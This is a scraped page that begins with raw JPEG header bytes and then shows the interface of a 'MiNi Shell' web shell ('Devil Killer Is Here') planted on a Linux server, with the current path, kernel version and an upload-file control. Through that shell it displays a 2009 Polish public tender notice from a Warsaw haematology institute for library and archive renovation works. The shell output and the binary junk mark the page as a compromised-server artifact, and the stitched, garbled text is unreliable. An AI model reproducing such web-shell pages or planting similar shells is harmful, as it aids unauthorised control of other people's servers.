JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20091001/341964-N-2009.html

<p class="kh_header"><b>Warszawa: IHIT/P/49/09 - Roboty Budowlane:  Zadanie 1: - Adaptacja pomieszczeń na I piętrze budynku 2A(B) wraz z dostawą i  montażem  regałów archiwalnych dla potrzeb biblioteki z funkcja Sali  szkoleniowej
 Zadanie 2: - Dostosowanie pomieszczeń w budynku 1 (A) dla potrzeb archiwum wraz z dostawą  i montażem regałów archiwalnych .</b><br>
<b>Numer ogłoszenia: 341964 - 2009; data zamieszczenia: 01.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Hematologii i Transfuzjologii , ul. Indiry Gandhi 14, 02-776 Warszawa, woj. mazowieckie, tel. 022 349 62 22, faks 022 349 62 23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ihit.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> IHIT/P/49/09 - Roboty Budowlane:  Zadanie 1: - Adaptacja pomieszczeń na I piętrze budynku 2A(B) wraz z dostawą i  montażem  regałów archiwalnych dla potrzeb biblioteki z funkcja Sali  szkoleniowej
 Zadanie 2: - Dostosowanie pomieszczeń w budynku 1 (A) dla potrzeb archiwum wraz z dostawą  i montażem regałów archiwalnych ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres  rzeczowy prac obejmuje :
ZADANIE 1. ADAPTACJĘ POMIESZCZEŃ NA I PIĘTRZE BUDYNKU 2A (B) WRAZ Z DOSTAWĄ I MONTAŻEM REGAŁÓW ARCHIWALNYCH DLA POTRZEB BIBLIOTEKI , Z FUNKCJĄ SALI SZKOLENIOWEJ;
W Instytucie Hematologii i Transfuzjologii ( IHIT ) w Warszawie ul. Gandhi 14 w istniejącym budynku 2a (B)  na I piętrze  we fragmencie korytarza zlokalizowano projektowaną bibliotekę - salę szkoleniową. Adaptacja ogranicza się do wnętrz Instytutu. Nie ingeruje w istniejącą bryłę, ani w elewację.
Program funkcjonalny zakłada utworzenie : 
- pomieszczenia czytelni - sali wykładowej nr 1/9
- oraz 2 pomieszczeń - magazynów książek o nr 1/10 i 1/7a 
Funkcja ta zapewnia warunki do przechowywania i udostępniania fachowego księgozbioru Instytutu oraz prowadzenia szkoleń z udostępnieniem technik elektronicznych przekazu.
Technologia w sensie rozwiązań użytkowych jest technologią biurowo-magazynową.
 W magazynach książek zastosowany zostanie system regałów jezdnych o wysokości 2 m .
W części czytelniano- szkoleniowej utworzonych zostaje 11 stanowisk z możliwością podłączenia tyluż komputerów
Zakres robót adaptacyjnych :
-   budowlanych:
1.	przygotowanie posadzki do montażu torów jezdnych regałów  
              bibliotecznych
2.	wykonanie podejść instalacji c.o. w posadzce;
3.	wykonanie ścian działowych w systemie suchej zabudowy właściwej 
             odporności ogniowej
4.	przebudowa sufitów podwieszonych;
5.	wymianę 1 szt. drzwi wewnętrznych na drzwi p.poż;
6.	zamontowanie nawiewników podokiennych;
7.	roboty wykończeniowe  i reparacyjne
-    instalacji sanitarnych
1.	rozbudowa instalacji c.o.;
2.	wykonanie wentylacji mechanicznej wyciągowej
3.	po zakończeniu robót należy wykonać pomiary i regulację wydajności wentylacji mechanicznej, poziomu hałasu i parametrów instalacji elektrycznej w zakresie wymaganym przepisami.
-    instalacji elektrycznych i teletechnicznych
1.	rozbudowa instalacji oświetlenia i gniazd wtykowych;
2.	rozbudowa instalacji ochrony od porażen;
3.	rozbudowa instalacji sygnalizacji pożaru
4.	wykonanie instalacji zasilania 
5.	rozbudowa instalacji oświetlenia ewakuacyjnego.
6.	wykonanie zasilania i sterowania do wentylacji. mechanicznych.
7.	instalacje elektryczne  i teletechniczne będą rozprowadzane w 
            przestrzeni międzysufitowej na istniejących korytkach kablowych jako n/t
8.	zejścia do poszczególnych stanowisk za pomocą słupków instalacyjnych w których będą zainstalowane gniazda teletechniczne. i elektryczne.
9	Wykonanie pomiarów: rezystancji izolacji instalacji elektrycznej, ciągłości przewodów ochronnych, połączeń wyrównawczych, pomiary impedancji pętli zwarcia, rezystancji uziemień, kontroli stanu izolacji oraz prądu zadziałania urządzeń ochronnych różnicowoprądowych  oraz pomiary uzyskanych natężeń oświetlenia. muszą być skwitowane odpowiednimi protokółami. 
-    wyposażenie  technologiczne
1	dostarczenie i montaż regałów jezdnych  w magazynach książek


ZADANIE 2. DOSTOSOWANIE POMIESZCZEŃ W BUDYNKU  1 (A)  DLA POTRZEB ARCHIWUM WRAZ Z DOSTAWĄ I MONTAŻEM REGAŁÓW ARCHIWALNYCH

W podziemnej kondygnacji na -2  w budynku Aprojektuje się wydzielenie części powierzchni  z dostosowaniem dla potrzeb utworzenia  dwóch pomieszczeń dla potrzeb archiwum zakładowego.
Zakres robót adaptacyjnych :
-   budowlanych:
1	wykonanie ścian  działowych z płyt gipsowo-kartonowych gr. 12,5 mm, ognioochronnych każde z utworzonych pomieszczeń zamykane  drzwiami ognioodpornymi 
-    instalacji sanitarnych
1	instalacja wentylacji mechanicznej oparta będzie na wymianie powietrza przy zastosowaniu wentylatorów 
2	w skład instalacji wchodzą: czerpnie, wyrzutnie, kanały i kształtki wentylacyjne typu spiro, wentylatory kanałowe: nawiewny i wywiewny typu SS Box , kratki wentylacyjne nawiewne, wywiewne i przelotowe 
3	oba pomieszczenia klimatyzowane przy użyciu klimatyzatorów naściennych typu SPLIT Po zakończeniu robót należy wykonać pomiary i regulację wydajności wentylacji mechanicznej, poziomu hałasu i parametrów instalacji elektrycznej w zakresie wymaganym przepisami.
-    instalacji elektrycznych i teletechnicznych
1	demontaż  istniejącej  instalacji elektrycznej w niezbędnym zakresie , /przewodów kabelkowych i opraw świetlówkowych  / z przełączeniem pozostałych obwodów instalacji w  pozostałej  części pomieszczenia  kondygnacji  podziemnej
2	instalacja w adaptowanych dwóch   pomieszczeniach archiwum .
- wykonanie kompletnej  instalacji elektrycznej  obwody oświetleniowe i gniazd  220V   w wykonaniu   natynkowym  rury winidurow układane n.t. 
 	   -	osprzęt  bryzgoszczelny, odgałęźniki i obudowy natynkowe gniazda podwójne, 
   - oświetleniowe oprawy   świetlówkowe  z kloszem i oprawy ewakuacyjne z modułem   awaryjnym 
	zasilanie pomieszczeń
-  do zasilania wentylacji i pomieszczeń przewidziano wykonanie   niezależnych linii zasilania   z istniejącej tablicy bezpiecznikowej  - w wykonaniu natynkowym  
	Oświetlenie 
  -  pozostaje   istniejące  oświetlenie podstawowe w ciągu  komunikacyjnym, przewidziano wykonanie   oświetlenie dodatkowego   drogi do archiwum oparto na oprawach typu  jarzeniowego  oraz  zamontowano dodatkowo oprawy ewakuacyjne z modułem awaryjnym 
  -  przełączanie  do nowych obwodów opraw z demontażu oświetlenia
	Wykonanie pomiarów: rezystancji izolacji instalacji elektrycznej, ciągłości przewodów ochronnych, połączeń wyrównawczych, pomiary impedancji pętli zwarcia, rezystancji uziemień, kontroli stanu izolacji oraz prądu zadziałania urządzeń ochronnych różnicowoprądowych oraz pomiary uzyskanych natężeń oświetlenia. muszą być skwitowane odpowiednimi protokółami. 
-    wyposażenie  technologiczne
	dostarczenie i montaż regałów jezdnych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu  mogą uczestniczyc Wykonawcy, którzy spełniają warunki o których mowa w art 22 ust. 1 i art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych. Zamawiający dokona oceny warunków udziału w postępowaniu na podstawie złożonych dokumentów lub oświadczeń  zgodnie z formuła - spełnia -nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia publicznego zobowiązany jest do złożenia następujących oświadczeń i dokumentów: 
1. Oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 i art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych - 2.  Dokumenty potwierdzające spełnienie warunków uprawniających do udziału w postępowaniu o 
     zamówienie publiczne zgodnie z § 1 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19.05.2006 r. (Dz. U. Nr 87, poz. 605 oraz Rozporządzenia Prezesa Rady Ministrów  z dnia 16.10.2008 r. zmieniającego w/wymienione rozporządzenie Dz. U. Nr 188 poz. 1155)  w    sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy  oraz form, w  jakich te dokumenty mogą być składane, tj.:
2.1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem składania ofert. 
2.2.Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.3.Wykaz wykonanych lub wykonywanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że roboty te zostały (są) wykonane (wykonywane) należycie. Wymagane: wykazanie co najmniej 1 realizacji robót budowlanych w  budynkach czynnych odpowiadające swoim rodzajem, zakresem robotom budowlanym stanowiącym przedmiot zamówienia o wartości nie mniejszej niż  300 tys. pln brutto.
  (Uwaga okres ostatnich 5 lat należy rozumieć jako okres liczony  od daty wyznaczonej jako termin składania ofert). Na potwierdzenie , że roboty te zostały wykonane należycie Wykonawca musi dołączy do oferty ( np. referencje lub bezusterkowe protokóły odbioru końcowego).
2.4.Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z  informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich  czynności.
  2.4.1 Wymagane wskazanie osoby , która będzie kierownikiem  robót,  posiadającej uprawnienia budowlane bez ograniczeń do kierowania budową i robotami w zakresie budowy  instalacji elektrycznych i sieci oraz wpisaną na listę członków właściwej izby  samorządu zawodowego - Na potwierdzenie -  załączyć kserokopie uprawnień  oraz zaświadczenie o wpisie na listę  właściwej  Izby Samorządu Zawodowego poświadczone za zgodność z  oryginałem przez  Wykonawcę  
 2.4.2. Wymagany wykaz osób   które będą  uczestniczyć w wykonywaniu zamówienia,  
                   posiadających  stosowne aktualne uprawnienia eksploatacyjne do 1 kV
                  Na potwierdzenie  - załączyć kserokopie uprawnień poświadczone za zgodność z oryginałem przez Wykonawcę  2.5.	Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od  
       odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości nie   mniejszej  niż  100 tys. zł.

Dokumenty, o których mowa w pkt.2 są składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez  Wykonawcę. 
3.	W przypadku gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP zgodnie z § 2 wyżej powołanego rozporządzenia:
3.1.	Zamiast dokumentów, o których mowa w pkt. 2 składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że:
a)	nie otwarto jego likwidacji ani nie ogłoszono jego upadłości (dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie (dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
c)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert)
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w p-ktach:  a); b) i c)  - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby luDokumenty, o których mowa w pkt. 3 są składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczone przez Wykonawcę. b kraju,  w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ihit.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Hematologii i Transfuzjologii; Ul. Indiry Gandhi 14; 02-776 Warszawa ; pokoj 508 , piętro V w godz. 9-15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2009 godzina 10:30, miejsce: Instytut Hematologii i Transfuzjologii; Ul. Indiry Gandhi 14; 02-776 Warszawa ; Kancelaria , pokój 144 A ;I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com